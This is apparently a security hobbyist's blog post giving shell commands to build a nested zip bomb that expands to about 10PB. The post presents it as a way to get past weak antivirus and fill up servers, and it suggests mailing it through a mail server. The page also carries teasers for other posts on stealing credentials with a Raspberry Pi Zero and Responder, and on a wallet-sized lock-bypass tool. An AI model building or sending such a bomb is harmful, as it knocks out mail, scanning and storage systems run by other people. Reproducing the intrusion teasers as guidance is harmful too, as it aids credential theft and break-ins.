Skip to main content

Zip Bombs

Zip bombs aren't new. Since the days of bulletin board systems people have been highly compressing implausibly large files and transferring them to target machines to consume resources.

Machines these days can handle much larger files and have ever larger amounts of RAM to process them, but zip bombs can still be very useful to an attacker in bypassing weak antivirus or filling up poorly protected servers. Some antivirus software will try to expand the zip file to scan it, using a lot of resources. Others don't try to expand huge files and simply let them through. Either of these options don't really protect us.

There was a zip file going around a year or two ago called 42.zip which expands to about 4.5PB. It's good, but can we do better?

The most efficient thing to compress is a string of 00000000's. So let's start with a GB of nothing.

 dd if=/dev/zero bs=1024 count=1048576 

And less squeeze that as much as possible

dd if=/dev/zero bs=1024 count=1048576 | zip -9 -q zipbomb.zip -
Now let's make 10 of those zip files and zip them up into a new zip file.

cp zipbomb.zip 0.zip
cp zipbomb.zip 1.zip
cp zipbomb.zip 2.zip
cp zipbomb.zip 3.zip
cp zipbomb.zip 4.zip
cp zipbomb.zip 5.zip
cp zipbomb.zip 6.zip
cp zipbomb.zip 7.zip
cp zipbomb.zip 8.zip
cp zipbomb.zip 9.zip
rm zipbomb.zip
zip -9 -q zipbomb.zip *.zip

Now rinse and repeat that last step 7 times.

That should give you a 28k zip file that contains 10PB of useless data. Yup, that's right, half the size and twice the data. You can check it out here.

I've put my little shell script up on github if you want to take a look.

How do you use it? Well mail it through your mail server and see if it makes it...
Labels:

Comments

Post a Comment

Popular posts from this blog

Snagging creds with Raspberry Pi Zero and Responder

So this is not all my own original work. This is a bringing together of the ethernet gadget tutorial by lady ada at adafruit and the beautiful work by Mubix at room362 which uses Laurent Gaffie's from SpiderLabs responder.py scripts. I'm still using Mubix's recipe of USB Ethernet + DHCP + Responder == Creds but here we are using a £4.00 Raspberry Pi Zero instead of the USB armoury or the HAK5 LAN turtle. Both are awesome products. Please note that this only works on the RPi Zero. Other RPi's will not work!   1.0 Setup the the RPi Zero for Ethernet over USB Download and install the latest Jessie Lite from here onto an SD Card. Pop the card out of the card reader and re-insert it to mount it. Take your favorite text editor and edit the following two files in the boot partition. config.txt Go to the bottom and add dtoverlay=dwc2 as the last line: Save the config.txt file. cmdline.txt After rootwait (the last word on the first line) add a spa...
3 comments
Read more

HoneyPot WarGames - The Hackers Dictionary

Every year security companies are coming up with the “worst passwords” based on breached credentials found on in the murkier parts of the internet. Every year people seem surprised that “123456” is a terrible password and people are still using it. Passwords often get rated by how quickly the could be “cracked”. The length of time for cracking passwords in the real world varies wildly according the the context and the numbers are often confusing. NordPass recently published their list of most common passwords and claimed that the third most popular password was “picture1” and it would take 3 hours to crack. If that’s referring to offline password cracking then we should have a whip-round to upgrade the hackers hardware because a password like that should take seconds to crack. When hackers try to brute force their way into an account online they have to try lots of different password combinations until they get in, or just give up. This takes a lot of time so hackers spend time optimiz...
Post a Comment
Read more

DIY RedTeam Bypass Tools - Wallet Jim

I keep hand written notes on everything I find that is useful. This is part of a series of blog posts on making your own DIY red team tools from my notes. Obviously you should only use these tools where you are allowed to use these tools, and you should take care when making or using any tools. These are just my notes on what worked for me, your mileage may very, etc. Wallet Sized Slim Jim Tool The slim jim or shove tool is for "latching loiding". It works by reaching into the gap between the door and the frame to push or pull on the latch. This won't work on a properly fitted lock which use a deadlatch or dead locking plunger. Many deadlatch locks are not properly fitted or badly maintained so it's always worth a try. The term loiding comes from celluloid used in filmstrips which was the material originally used in some of these attacks. This jim is very small and sized to fit in a wallet. You are going to need: Materials: This is made from a thin steel ruler l...
Post a Comment
Read more